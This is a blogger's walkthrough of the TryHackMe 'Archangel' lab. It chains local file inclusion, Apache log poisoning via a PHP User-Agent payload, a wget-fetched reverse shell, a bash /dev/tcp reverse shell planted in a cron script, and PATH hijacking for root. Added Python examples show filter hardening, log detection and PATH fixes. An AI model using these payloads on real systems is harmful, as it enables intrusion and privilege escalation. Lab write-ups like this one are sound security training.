Archangel | TryHackMe Walkthrough

Enumeration
We will start with nmap:
nmap -A $IP -v -o nmap.scan -p-

We have two ports open: 22 (SSH) and 80 (HTTP).
Since port 80 is open on the webserver, let's see what directories we can find…
Run gobuster:
gobuster dir -u $IP -w /usr/share/wordlists/dirb/common.txt -o go.scan

/flags… can it be this easy? We'll find out!
From this, we can see there's a 'flags' directory; let's check it out. A text document labeled flag.html is in there… but where does this HTML page lead… Yep. Nice one, Arch… nice one. You got me.
After brushing off the Rickroll, we can just view the plain website.

Let’s see if we can find any clues in here… start checking out dem links! From a quick recon, we can deduce the following:
- There's a gallery tab with a bunch of empty photos. Maybe we can upload something here later? (Spoiler alert: no.)
- The whole page is Lorem Ipsum; ok, useless fact.
- The page source reveals an e-mail address at @mafialive.thm, which hints that this is the domain name used by this box.

mafialive.thm is our target domain.
No robots.txt, bummer. But no biggie.
Side note: visiting /layout and /pages reveals nothing interesting.
Let’s add mafialive.thm to our hosts file and see where this new domain takes us.

echo "$IP mafialive.thm" | sudo tee -a /etc/hosts
Navigate to the website and you will see our first flag.
I'm going to rerun gobuster against http://mafialive.thm/ with directory-list-2.3-medium. While this runs, try some obvious directories such as /secret, /admin, /mafia, /login, /arch… nada.
The hint says Fuzz… so let's fuzz using ZAP. A quick scan of the domain revealed a robots.txt and test.php.

robots.txt reveals /test.php (which ZAP also identified, but worth checking anyway).

Well, there’s… a button. Let’s see what this button does. I feel like Homer Simpson right now.

Push the button… Galvanize anyone? Hit me up on Twitter if you catch the ref ;)
Ok, we see that this action changed our URI by adding a view parameter. We also know that this room is partly about LFI, so let's focus on this clue…
Local File Inclusion
Let's use LFI. Using this LFI cheat sheet, I systematically tried things until I got a hit with the mrrobot.php and test.php files.


What is this sorcery? Well, if we read what we've just done it becomes more obvious: we are telling the server to serve us mrrobot.php and test.php base64-encoded. So we can now read these two PHP files by decoding the strings.
mrrobot.php base64 decodes into the following:

This is the text we saw earlier when we galvanized…
test.php base64 decodes into the following… which also contains a flag!

What is happening here? Let’s look at the code as per our hint.
Running test.php lets us use the 'view' parameter we saw earlier, subject to two rules:
- The URI must NOT contain ‘../..’
- The URI MUST contain ‘/var/www/html/development_test’
Great, we know the rules, let’s play with some LFI.
This is where I was a bit stuck, chasing my tail all night, as I was unfamiliar with it, but after reading some articles on LFI and cheat sheets on finding log files I was able to get further. Perhaps I shouldn't have been basking in some of my green Canadian freedom while hacking, but hey, #legalherebro #ujelly.
Here is the logic behind what we need to achieve:
- Find a way to inject code into a log file that lets us execute an additional command, so we can get a reverse shell.
- That's it. Really, that's it… but getting to this result can be tricky for beginner-esque hacker babies such as myself.
Log poisoning
After doing some reading on LFI (Google.Is.Your.Friend.), I found out that Apache2 stores its access log under /var/log/apache2/access.log, which is also a common target for log poisoning. What does this file do? It logs access requests from clients. So…. what if we can get some code into this log file that lets us run commands? Enter Burp Suite. *belches*
We can change our User-Agent in the request to insert some code, which then gets written to the log file, enabling us to execute code, so long as we include the log file through the URL first.
But wait a minute… how do we get to this log file if we can't use '../..'? Easy. Bypass. '..//..//..' will be interpreted the same as '../../..'. (This stumped me for an hour or two *shies away in a corner*.)
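To see why the two rules above are a weak defence, here is an added Python model of them next to a hardened check (this is my example, not the room's test.php; the include root /var/www/html/development_testing is assumed from the page's own URLs). The hardened version normalises the path before deciding, so every spelling of the traversal, including the '..//..//..' bypass, resolves to the same canonical path and is rejected.

```python
import posixpath

# Assumption: the include root is the directory the page's own URLs use.
WEB_ROOT = "/var/www/html/development_testing"

def weak_filter(view):
    """Model of the two rules the page describes for test.php's 'view' parameter:
    reject '../..' as a substring, require the development_test prefix as a substring.
    Both are string checks, so neither says anything about where the path resolves."""
    return "../.." not in view and "/var/www/html/development_test" in view

def canonical(view):
    """Collapse '//' and '/./' and resolve every '..' component, so all spellings
    of the same traversal become one path (realpath would also resolve symlinks)."""
    return posixpath.normpath(view)

def strict_filter(view):
    """Hardened check: decide on the normalised path, not on the raw string."""
    path = canonical(view)
    inside_root = path.startswith(WEB_ROOT + "/")
    # Defence in depth: only PHP pages are meant to be included, never log files.
    return inside_root and path.endswith(".php")

def compare(view):
    """(weak verdict, strict verdict) for one value of the 'view' parameter."""
    return weak_filter(view), strict_filter(view)

if __name__ == "__main__":
    # Constructed inputs: the legitimate page, the plain traversal the rules block,
    # and the two spellings of the bypass the page describes.
    for v in (WEB_ROOT + "/mrrobot.php",
              WEB_ROOT + "/../../../log/apache2/access.log",
              WEB_ROOT + "/..//..//..//log/apache2/access.log",
              WEB_ROOT + "/.././.././../log/apache2/access.log"):
        print(f"{v}\n  weak/strict = {compare(v)}  resolves to {canonical(v)}")
```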

Pay special attention to the User-Agent header, which I modified to <?php system($_GET['cmd']); ?>
Now that the log file is poisoned with that PHP snippet, we can include it in our URL and use the 'cmd' parameter.
Test that out, and you should see a whole bunch of text output from access.log. The more you run this URL, the deeper you will drown in text (because every request is logged). Example:

I ran this with a few different things to show you how congested this can get. If it's too painful, use Ctrl+F or reboot your machine.
Now that we have confirmed Remote Command Execution (RCE), let's get a shell by using that 'cmd' parameter to invoke a reverse shell. I tried (as you may see above) a few things such as bash, nc, etc. through the URL (URL-encoding it and everything) but was unable to secure a shell that way. So I went a slightly different route: I created the shell on my machine and fetched it via the RCE.
First make sure your shell is ready (I use the php-reverse-shell.php included in Kali):
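From the blue-team side, the poisoning is easy to spot because the payload is sitting in the log itself. The following added Python example (mine, not from the room) parses Apache combined-format lines and flags PHP code in the User-Agent or Referer, a query parameter pointing at a web-server log, and '../' traversal; the three log lines and the client IP 10.0.0.5 are constructed.

```python
import re

# Constructed sample in Apache "combined" log format (not a capture from the room;
# the client IP 10.0.0.5 is made up). Line 2 is a poisoning attempt via the
# User-Agent, line 3 includes the log back through the vulnerable 'view' parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:12:00:01 +0000] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2021:12:00:07 +0000] "GET / HTTP/1.1" 200 1024 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.5 - - [01/Jan/2021:12:00:15 +0000] "GET /test.php?view=/var/www/html/development_testing/..//..//..//log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Combined format: ip ident user [time] "request" status size "referer" "user-agent".
# Apache escapes embedded quotes as \", which these samples do not contain.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# PHP open tags or command-execution functions have no business in a UA or referer.
PHP_CODE = re.compile(r"<\?(?:php|=)|\b(?:system|passthru|shell_exec|exec)\s*\(", re.I)
# A query parameter pointing at a web-server log, and any '../' traversal sequence.
LOG_INCLUDE = re.compile(r"[?&]\w+=[^&\s]*(?:access|error)\.log", re.I)
TRAVERSAL = re.compile(r"\.\./")

def scan(log_text):
    """Return one finding per suspicious line: its number, client IP and reasons."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real monitor would flag these too
        reasons = []
        for field in ("ua", "ref"):
            if PHP_CODE.search(m.group(field)):
                reasons.append(f"php code in {field}")
        if LOG_INCLUDE.search(m.group("req")):
            reasons.append("log file referenced in query")
        if TRAVERSAL.search(m.group("req")):
            reasons.append("directory traversal in request")
        if reasons:
            findings.append({"line": n, "ip": m.group("ip"), "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']} from {f['ip']}: {', '.join(f['reasons'])}")
```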

You can change the name to ‘shell.php’ like I eventually did to make it easier.
Once that's done, 'wget' it from the URI:
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget http://10.6.55.167:5555/shell.php
You can verify it's uploaded by accessing access.log like we did previously and looking for our 'shell.php' file with the 'ls -l' command.
RCE — Reverse Shell
Once you have confirmed your shell was successfully uploaded to the server, open up a netcat listener on the port set in your shell (mine was 1234) and then navigate to: http://mafialive.thm/shell.php.

Bada-bing bada-shell!
Now we have a terminal. Time to upgrade this shell; I grabbed my notes to do this:

You can then press Ctrl+Z to background your shell, then run 'stty raw -echo; fg' to get a stable shell and bring it back to the foreground.
Now we can find our first flag in the shell quite easily with some basic CTF-101 logic. Let's go home.
cd home

cat user.txt for your flag.
We see two directories, 'myfiles' and 'secret'. Let's start with the juicy secret directory… access denied. What about myfiles? Listing it rickrolls us… again. CLASSIC ARCHANGEL!!! 2 for 2 now! ;)
Privilege Escalation — archangel
Ok, since we can't get the obvious stuff, let's go ahead and upload a script to check for interesting things: linpeas.sh
Start a Python HTTP server in the directory where your linpeas.sh is located and 'wget' it from the victim box. Oops… error: Access Denied. Switch to /tmp first, because we cannot save files in our current directory. Success.

Ok, let's chmod +x linpeas.sh and run it on the victim box to enumerate the system and find some vectors for privesc.

Let's scan the output for anything useful… usually we can find something fishy in the SUIDs or cron jobs.
SUIDs:

Nothing out of the ordinary…
Nothing we can exploit. Moving on.
Cron jobs:

Hello stranger…
We see there's an interesting bash script in /opt/ that runs as a cron job at 1-minute intervals. Let's look at what it does.

Check those permissions out: we can write to this. Let's exploit it by injecting reverse shell code.
We'll grab a reverse shell one-liner that works with bash and put it in place of what's inside.
bash -i >& /dev/tcp/10.6.55.167/4242 0>&1

…and I clearly made a mistake lol. Still www-data, useless. Let's modify our shell code.
Let's try a nc reverse shell, but keep the original code in there (I typed it back in through nano on the victim machine). Remember this file is a cron job? Good.
Now we set up a listener on our attacker machine on the same port we indicated just above… Don't run the file, just leave it as is… patience… patience… *60 seconds or less goes by*

Shiiiiiet, we are now archangel!

Let’s go get that user2 flag, in our home directory.

Privilege Escalation — root
There's another file in there called 'backup'. Trying to cat it, we get a bunch of gobbledygook…

so let's see if there's anything interesting in there using 'strings'. Scrolling through, I see that there is a 'cp' command; let's follow it.

We see that 'cp' isn't called with an absolute path… good news for us!
Our next hint to find the root flag states "Certain paths are dangerous"… we now know why ;). Let's create a file called cp so we can trick this 'backup' program into using it instead, by altering our PATH variable. Here's how we do it:
First, we create a file called cp and chmod +x it to make it executable. Then we make sure it contains the following:
#!/bin/bash
bash -p
We then prepend this folder to our PATH variable, so that when 'cp' is run the system looks in the secret directory first:
export PATH=/home/archangel/secret:$PATH

Run ./backup and we are now root. cat /root/root.txt FTW.
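The fix for the "dangerous path" is on the program's side: call binaries by absolute path and reset PATH before doing anything privileged. Here is an added Python audit helper (my example, not part of the room) that finds commands a script resolves through PATH, lists PATH entries a privileged program should not trust, and rewrites the known ones to absolute paths. The backup command line and the Debian-style binary locations are assumptions, not the room's real values.

```python
import re
import shlex

# Assumptions (not the room's real values): the backup binary runs this shell
# command line, found with 'strings' as the page describes; Debian-style locations.
BACKUP_CMD = "cp /home/archangel/myfiles/* /opt/backupfiles"
KNOWN_BINARIES = {"cp": "/bin/cp", "mv": "/bin/mv", "tar": "/bin/tar", "rm": "/bin/rm"}
SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

def bare_commands(cmdline):
    """Names of commands invoked without a directory component, i.e. found via PATH."""
    names = []
    for segment in re.split(r"\s*(?:&&|\|\||;|\|)\s*", cmdline):
        words = shlex.split(segment)
        if words and "/" not in words[0]:
            names.append(words[0])
    return names

def risky_path_entries(path_value):
    """PATH entries a privileged program must not trust: anything outside the system
    directories (home dirs, /tmp, ...) and empty entries, which mean the current dir."""
    trusted = set(SAFE_PATH.split(":"))
    return [e for e in path_value.split(":") if e not in trusted]

def harden(cmdline, path_value):
    """Pin every known bare command to its absolute path and report why.
    Returns (rewritten command line, list of findings)."""
    findings = []
    for name in bare_commands(cmdline):
        if name in KNOWN_BINARIES:
            findings.append(f"'{name}' is resolved through PATH; use {KNOWN_BINARIES[name]}")
            # Replace the bare name only as a whole word at the start of a command
            # or right after a separator, so arguments containing it are left alone.
            cmdline = re.sub(rf"(^|[\s;&|]){name}(?=\s|$)", rf"\g<1>{KNOWN_BINARIES[name]}", cmdline)
    for entry in risky_path_entries(path_value):
        findings.append(f"untrusted PATH entry: {entry or '(empty = current directory)'}")
    if findings:
        findings.append(f"set PATH={SAFE_PATH} inside the program before running anything")
    return cmdline, findings

if __name__ == "__main__":
    # The PATH the page ends up with once the secret directory is prepended.
    fixed, notes = harden(BACKUP_CMD, "/home/archangel/secret:/usr/bin:/bin")
    print(fixed)
    for note in notes:
        print(" -", note)
```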

Thanks for reading, but more importantly thank you Arch for the awesome room!